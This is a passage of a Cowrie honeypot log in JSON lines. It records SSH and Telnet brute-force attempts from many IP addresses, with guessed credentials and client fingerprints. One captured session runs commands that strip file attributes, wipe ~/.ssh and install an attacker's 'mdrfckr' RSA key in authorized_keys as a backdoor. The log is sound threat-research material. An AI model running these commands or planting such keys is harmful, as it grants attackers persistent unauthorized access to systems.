enssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:28:58.242428Z","src_ip":"212.227.235.229","session":"c27697ac13b0"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:28:59.115433Z","src_ip":"212.227.235.229","session":"c27697ac13b0"}
{"eventid":"cowrie.login.success","username":"root","password":"r7w957957","message":"login attempt [root/r7w957957] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:28:59.274302Z","src_ip":"201.148.180.50","session":"acd84365e8db"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:59.324889Z","src_ip":"212.227.235.229","session":"a3be94268ca9"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:28:59.325776Z","src_ip":"212.227.235.229","session":"c27697ac13b0"}
{"eventid":"cowrie.session.closed","duration":120.00230765342712,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:01.628102Z","src_ip":"212.227.125.160","session":"16e1839af7d1"}
{"eventid":"cowrie.session.closed","duration":120.00153732299805,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:01.628806Z","src_ip":"212.227.125.160","session":"775d2ee86d61"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:29:01.652729Z","src_ip":"201.148.180.50","session":"acd84365e8db"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-31T01:29:01.653474Z","src_ip":"201.148.180.50","session":"acd84365e8db"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:02.866832Z","src_ip":"201.148.180.50","session":"acd84365e8db"}
{"eventid":"cowrie.session.closed","duration":"11.8","message":"Connection lost after 11.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:02.868067Z","src_ip":"201.148.180.50","session":"acd84365e8db"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:08.668851Z","src_ip":"115.190.94.119","session":"947378cd98d7"}
{"eventid":"cowrie.session.connect","src_ip":"82.67.125.95","src_port":35882,"dst_ip":"1.2.3.4","dst_port":22,"session":"19b2f47689fc","protocol":"ssh","message":"New connection: 82.67.125.95:35882 (1.2.3.4:22) [session: 19b2f47689fc]","sensor":"my-vps","timestamp":"2025-08-31T01:29:11.213775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:29:11.214646Z","src_ip":"82.67.125.95","session":"19b2f47689fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:29:11.250351Z","src_ip":"82.67.125.95","session":"19b2f47689fc"}
{"eventid":"cowrie.login.failed","username":"sasan","password":"sasan","message":"login attempt [sasan/sasan] failed","sensor":"my-vps","timestamp":"2025-08-31T01:29:11.435022Z","src_ip":"82.67.125.95","session":"19b2f47689fc"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:12.473692Z","src_ip":"82.67.125.95","session":"19b2f47689fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"16.1","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 16.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:14.110004Z","src_ip":"212.227.235.229","session":"b44184811555"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45176,"dst_ip":"1.2.3.4","dst_port":22,"session":"64793c913c85","protocol":"ssh","message":"New connection: 212.227.235.229:45176 (1.2.3.4:22) [session: 64793c913c85]","sensor":"my-vps","timestamp":"2025-08-31T01:29:22.563644Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:29:23.669269Z","src_ip":"212.227.235.229","session":"64793c913c85"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:29:23.670013Z","src_ip":"212.227.235.229","session":"64793c913c85"}
{"eventid":"cowrie.session.closed","duration":"126.3","message":"Connection lost after 126.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:23.783089Z","src_ip":"212.227.235.229","session":"b44184811555"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1227,"dst_ip":"1.2.3.4","dst_port":22,"session":"b89bde66d016","protocol":"ssh","message":"New connection: 102.88.137.80:1227 (1.2.3.4:22) [session: b89bde66d016]","sensor":"my-vps","timestamp":"2025-08-31T01:29:27.219591Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:29:27.220625Z","src_ip":"102.88.137.80","session":"b89bde66d016"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:29:27.343400Z","src_ip":"102.88.137.80","session":"b89bde66d016"}
{"eventid":"cowrie.login.failed","username":"vmarketing","password":"vmarketing","message":"login attempt [vmarketing/vmarketing] failed","sensor":"my-vps","timestamp":"2025-08-31T01:29:27.877014Z","src_ip":"102.88.137.80","session":"b89bde66d016"}
{"eventid":"cowrie.login.failed","username":"developer","password":"password1","message":"login attempt [developer/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:29:28.544879Z","src_ip":"212.227.235.229","session":"64793c913c85"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:29.002120Z","src_ip":"102.88.137.80","session":"b89bde66d016"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:30.506717Z","src_ip":"212.227.235.229","session":"64793c913c85"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36496,"dst_ip":"1.2.3.4","dst_port":22,"session":"18e66d19d49f","protocol":"ssh","message":"New connection: 212.227.125.160:36496 (1.2.3.4:22) [session: 18e66d19d49f]","sensor":"my-vps","timestamp":"2025-08-31T01:29:45.078567Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:29:45.522631Z","src_ip":"212.227.125.160","session":"18e66d19d49f"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:29:45.523565Z","src_ip":"212.227.125.160","session":"18e66d19d49f"}
{"eventid":"cowrie.login.failed","username":"developer","password":"password1","message":"login attempt [developer/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:29:47.861985Z","src_ip":"212.227.125.160","session":"18e66d19d49f"}
{"eventid":"cowrie.session.connect","src_ip":"197.246.110.14","src_port":46477,"dst_ip":"1.2.3.4","dst_port":23,"session":"cd6f805e6106","protocol":"telnet","message":"New connection: 197.246.110.14:46477 (1.2.3.4:23) [session: cd6f805e6106]","sensor":"my-vps","timestamp":"2025-08-31T01:29:48.123119Z"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:29:49.576460Z","src_ip":"212.227.125.160","session":"18e66d19d49f"}
{"eventid":"cowrie.session.connect","src_ip":"172.200.228.35","src_port":59618,"dst_ip":"1.2.3.4","dst_port":22,"session":"85c526b1dff7","protocol":"ssh","message":"New connection: 172.200.228.35:59618 (1.2.3.4:22) [session: 85c526b1dff7]","sensor":"my-vps","timestamp":"2025-08-31T01:30:05.813956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:30:05.815080Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:30:05.924423Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.login.success","username":"root","password":"123580","message":"login attempt [root/123580] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:30:06.415288Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:30:06.651922Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:30:06.652585Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T01:30:06.654107Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:06.765663Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:30:07.041719Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T01:30:07.042614Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T01:30:07.154252Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:07.155296Z","src_ip":"172.200.228.35","session":"85c526b1dff7"}
{"eventid":"cowrie.session.connect","src_ip":"172.200.228.35","src_port":59622,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cdf5bad4b9a","protocol":"ssh","message":"New connection: 172.200.228.35:59622 (1.2.3.4:22) [session: 1cdf5bad4b9a]","sensor":"my-vps","timestamp":"2025-08-31T01:30:07.262368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:30:07.263097Z","src_ip":"172.200.228.35","session":"1cdf5bad4b9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:30:07.371822Z","src_ip":"172.200.228.35","session":"1cdf5bad4b9a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T01:30:07.853117Z","src_ip":"172.200.228.35","session":"1cdf5bad4b9a"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":32807,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e97b4a44d0e","protocol":"ssh","message":"New connection: 80.94.95.15:32807 (1.2.3.4:22) [session: 3e97b4a44d0e]","sensor":"my-vps","timestamp":"2025-08-31T01:30:08.779463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T01:30:08.780897Z","src_ip":"80.94.95.15","session":"3e97b4a44d0e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T01:30:08.846969Z","src_ip":"80.94.95.15","session":"3e97b4a44d0e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:30:08.964718Z","src_ip":"172.200.228.35","session":"1cdf5bad4b9a"}
{"eventid":"cowrie.session.connect","src_ip":"172.200.228.35","src_port":59624,"dst_ip":"1.2.3.4","dst_port":22,"session":"cea5dd452a1b","protocol":"ssh","message":"New connection: 172.200.228.35:59624 (1.2.3.4:22) [session: cea5dd452a1b]","sensor":"my-vps","timestamp":"2025-08-31T01:30:09.075340Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:30:09.076199Z","src_ip":"172.200.228.35","session":"cea5dd452a1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"